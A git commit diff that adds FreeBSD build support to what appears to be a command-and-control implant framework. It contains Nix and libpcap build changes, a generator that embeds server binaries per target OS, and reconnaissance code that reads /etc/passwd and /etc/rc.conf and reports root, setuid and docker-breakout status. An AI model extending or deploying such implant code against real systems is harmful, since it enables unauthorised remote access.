feat: added FreeBSD support

to make use of it, create a FreeBSD VM with curl installed and install
rustup by default from rustup.rs, then run `cargo build -p sparse-05-server`

.gitignore

@@ -6,6 +6,7 @@ core
 .direnv
 result
 sparse-public
-
 rust9x.7z
 rust9x
+sparse-05-freebsd-server
+sparse-05/sparse-05-freebsd-server

flake.nix

@@ -62,16 +62,13 @@
 
         craneLib = (crane.mkLib pkgs).overrideToolchain toolchain;
 
-        src = craneLib.cleanCargoSource (craneLib.path ./.);
+        src = craneLib.path ./.;
 
         commonArgs = {
           inherit src;
 
           strictDeps = false;
 
-          CARGO_BUILD_RUSTFLAGS = "-C target-feature=+crt-static";
-          CARGO_BUILD_TARGET = "x86_64-unknown-linux-musl";
-
           SPARSE_BUILD_LIBPCAP = "${libpcap-src}";
           SPARSE_BUILD_LIBNL = "${libnl}";
 
@@ -81,8 +78,14 @@
           doCheck = false;
         };
 
+        commonLinuxArgs = commonArgs // {
+          CARGO_BUILD_TARGET = "x86_64-unknown-linux-musl";
+          CARGO_BUILD_RUSTFLAGS = "-C target-feature=+crt-static";
+        };
+
         commonWindowsArgs = commonArgs // {
           CARGO_BUILD_TARGET = "x86_64-pc-windows-gnu";
+          CARGO_BUILD_RUSTFLAGS = "-C target-feature=+crt-static";
 
           SPARSE_BUILD_WINPCAP = "${winpcap}/Lib";
 
@@ -90,11 +93,11 @@
           buildInputs = windowsBuildTools;
         };
 
-        artifacts = craneLib.buildDepsOnly commonArgs;
+        linuxArtifacts = craneLib.buildDepsOnly commonLinuxArgs;
         windowsArtifacts = craneLib.buildDepsOnly commonWindowsArgs;
 
-        sparse-05-linux-server = craneLib.buildPackage (commonArgs // {
-          inherit artifacts;
+        sparse-05-linux-server = craneLib.buildPackage (commonLinuxArgs // {
+          artifacts = linuxArtifacts;
 
           pname = "sparse-05-linux-server";
           cargoExtraArgs = "-p sparse-05-server --locked";
@@ -115,8 +118,8 @@
             cargoExtraArgs = "-p sparse-05-server --locked --features service";
           });
 
-        sparse-05-client = craneLib.buildPackage (commonArgs // {
-          inherit artifacts;
+        sparse-05-client = craneLib.buildPackage (commonLinuxArgs // {
+          artifacts = linuxArtifacts;
 
           SPARSE_WINDOWS_SERVER =
             "${sparse-05-windows-server}/bin/sparse-05-server.exe";
@@ -129,22 +132,22 @@
           cargoExtraArgs = "-p sparse-05-client --locked";
         });
 
-        sparse-c2-linux-beacon = craneLib.buildPackage (commonArgs // {
-          inherit artifacts;
+        sparse-c2-linux-beacon = craneLib.buildPackage (commonLinuxArgs // {
+          artifacts = linuxArtifacts;
 
           pname = "sparse-c2-beacon";
           cargoExtraArgs = "-p sparse-c2-beacon --locked";
         });
 
-        sparse-c2-server = craneLib.buildPackage (commonArgs // {
-          inherit artifacts;
+        sparse-c2-server = craneLib.buildPackage (commonLinuxArgs // {
+          artifacts = linuxArtifacts;
 
           pname = "sparse-c2-server";
           cargoExtraArgs = "-p sparse-c2-server --locked";
         });
 
-        sparse-c2-client = craneLib.buildPackage (commonArgs // {
-          inherit artifacts;
+        sparse-c2-client = craneLib.buildPackage (commonLinuxArgs // {
+          artifacts = linuxArtifacts;
 
           pname = "sparse-c2-client";
           cargoExtraArgs = "-p sparse-c2-client --locked";

pcap-sys/build.rs

@@ -20,6 +20,32 @@ fn main() {
         println!("cargo:rustc-link-search=native={}", std::env::var("SPARSE_BUILD_WINPCAP").unwrap());
         println!("cargo:rustc-link-search=native={}/x64", std::env::var("SPARSE_BUILD_WINPCAP").unwrap());
         println!("cargo:rustc-link-lib=wpcap");
+    } else if std::env::var("CARGO_CFG_TARGET_OS").unwrap() == "freebsd" {
+        let libpcap_src = format!("{}/pcap_src", std::env::var("OUT_DIR").unwrap());
+
+        let mut options = CopyOptions::new();
+        options.copy_inside = true;
+        options.skip_exist = true;
+        copy(std::env::var("SPARSE_BUILD_LIBPCAP").unwrap(), &libpcap_src, &options).expect("could not copy libpcap source code to build");
+
+        let dst = cmake::Config::new(&libpcap_src)
+            .profile("MinSizeRel")
+            .define("BUILD_SHARED_LIBS", "OFF")
+            .define("DISABLE_BLUETOOTH", "ON")
+            .define("DISABLE_DAG", "ON")
+            .define("DISABLE_DBUS", "ON")
+            .define("DISABLE_DPDK", "ON")
+            .define("DISABLE_NETMAP", "ON")
+            .define("DISABLE_RDMA", "ON")
+            .define("DISABLE_SEPTEL", "ON")
+            .define("DISABLE_SNF", "ON")
+            .define("DISABLE_TC", "ON")
+            .build();
+
+        // panic!("hahahahah test {}", dst.display());
+        println!("cargo:rustc-link-search=native={}/lib", dst.display());
+        println!("cargo:rustc-link-search=native={}/lib64", dst.display());
+        println!("cargo:rustc-link-lib=static=pcap");
     } else {
         let libpcap_src = format!("{}/pcap_src", std::env::var("OUT_DIR").unwrap());
 
@@ -29,6 +55,7 @@ fn main() {
         copy(std::env::var("SPARSE_BUILD_LIBPCAP").unwrap(), &libpcap_src, &options).expect("could not copy libpcap source code to build");
 
         let dst = cmake::Config::new(&libpcap_src)
+            .profile("MinSizeRel")
             .define("BUILD_SHARED_LIBS", "OFF")
             .define("BUILD_WITH_LIBNL", "OFF")
             .define("DISABLE_BLUETOOTH", "ON")

rust-toolchain.bsd.toml

@@ -0,0 +1,5 @@
+[toolchain]
+channel = "stable"
+components = []
+targets = [ "x86_64-unknown-freebsd" ]
+profile = "minimal"

sparse-05/sparse-05-client/src/commands/generate.rs

@@ -12,12 +12,14 @@ pub const SPARSE_LINUX_SERVER_BINARY: &'static [u8] =
 #[cfg(not(debug_assertions))]
 pub const SPARSE_LINUX_SERVER_BINARY: &'static [u8] =
     include_bytes!(std::env!("SPARSE_LINUX_SERVER"));
+
 #[cfg(debug_assertions)]
 pub const SPARSE_WINDOWS_SERVER_BINARY: &'static [u8] =
     include_bytes!("../../../../target/x86_64-pc-windows-gnu/debug/sparse-05-server.exe");
 #[cfg(not(debug_assertions))]
 pub const SPARSE_WINDOWS_SERVER_BINARY: &'static [u8] =
     include_bytes!(std::env!("SPARSE_WINDOWS_SERVER"));
+
 #[cfg(debug_assertions)]
 pub const SPARSE_WINDOWS_SERVICE_BINARY: &'static [u8] =
     include_bytes!("../../../../target/x86_64-pc-windows-gnu/debug/sparse-05-server.exe");
@@ -25,6 +27,9 @@ pub const SPARSE_WINDOWS_SERVICE_BINARY: &'static [u8] =
 pub const SPARSE_WINDOWS_SERVICE_BINARY: &'static [u8] =
     include_bytes!(std::env!("SPARSE_WINDOWS_SERVICE"));
 
+pub const SPARSE_FREEBSD_SERVER_BINARY: &'static [u8] =
+    include_bytes!("../../../sparse-05-freebsd-server");
+
 pub async fn generate(mut name: PathBuf, port: u16, target: TargetOs) -> anyhow::Result<()> {
     let mut csprng = rand::thread_rng();
     let keypair = Keypair::generate(&mut csprng);
@@ -53,6 +58,7 @@ pub async fn generate(mut name: PathBuf, port: u16, target: TargetOs) -> anyhow:
 
     file.write_all(match target {
         TargetOs::Linux => SPARSE_LINUX_SERVER_BINARY,
+        TargetOs::FreeBSD => SPARSE_FREEBSD_SERVER_BINARY,
         TargetOs::Windows => SPARSE_WINDOWS_SERVER_BINARY,
         TargetOs::WindowsService => SPARSE_WINDOWS_SERVICE_BINARY
     })

sparse-05/sparse-05-client/src/options.rs

@@ -16,6 +16,7 @@ fn to_socket_addr(src: &str) -> Result<SocketAddr, std::io::Error> {
 
 pub enum TargetOs {
     Linux,
+    FreeBSD,
     Windows,
     WindowsService,
 }

sparse-05/sparse-05-common/src/lib.rs

@@ -96,6 +96,7 @@ pub mod messages {
     pub enum OperatingSystem {
         Windows,
         Linux,
+        FreeBSD
     }
 
     #[derive(Serialize, Deserialize, Debug)]

sparse-05/sparse-05-server/src/capabilities.rs

@@ -2,6 +2,7 @@
 use std::ffi::c_int;
 use std::path::PathBuf;
 
+use anyhow::Context;
 use sparse_05_common::messages::{Capabilities, OperatingSystem, TransportType};
 
 #[derive(Debug)]
@@ -60,7 +61,7 @@ struct cap_user_data_t {
     inheritable: u32,
 }
 
-#[cfg(target_os = "linux")]
+#[cfg(any(target_os = "linux", target_os = "freebsd"))]
 fn get_username(uid: u32) -> anyhow::Result<Option<String>> {
     let passwd = std::fs::read_to_string("/etc/passwd")?;
 
@@ -118,11 +119,7 @@ fn get_current_capabilities() -> anyhow::Result<SrvCapabilities> {
         .ok();
 
     Ok(SrvCapabilities {
-        operating_system: if cfg!(target_os = "linux") {
-            OperatingSystem::Linux
-        } else {
-            OperatingSystem::Windows
-        },
+        operating_system: OperatingSystem::Linux,
         docker_container,
         docker_breakout,
         setuid,
@@ -153,6 +150,31 @@ fn get_current_capabilities() -> anyhow::Result<SrvCapabilities> {
     })
 }
 
+#[cfg(target_os = "freebsd")]
+fn get_current_capabilities() -> anyhow::Result<SrvCapabilities> {
+    let uid = unsafe { libc::getuid() };
+    let root = uid == 0;
+    let userent = get_username(uid)?;
+    let hostname = std::fs::read_to_string("/etc/rc.conf")?
+        .split("\n")
+        .map(|line| line.split("=").collect::<Vec<_>>())
+        .find(|line| line.get(0) == Some(&"hostname"))
+        .map(|line| line.get(1).map(|name| name.to_string()))
+        .flatten();
+
+    Ok(SrvCapabilities {
+        operating_system: OperatingSystem::FreeBSD,
+        docker_container: false,
+        docker_breakout: false,
+        setuid: false,
+        service: false,
+        root,
+        userent: userent.clone(),
+        transport: TransportType::RawUdp,
+        hostname,
+    })
+}
+
 pub fn get_capabilities() -> anyhow::Result<SrvCapabilities> {
     get_current_capabilities()
 }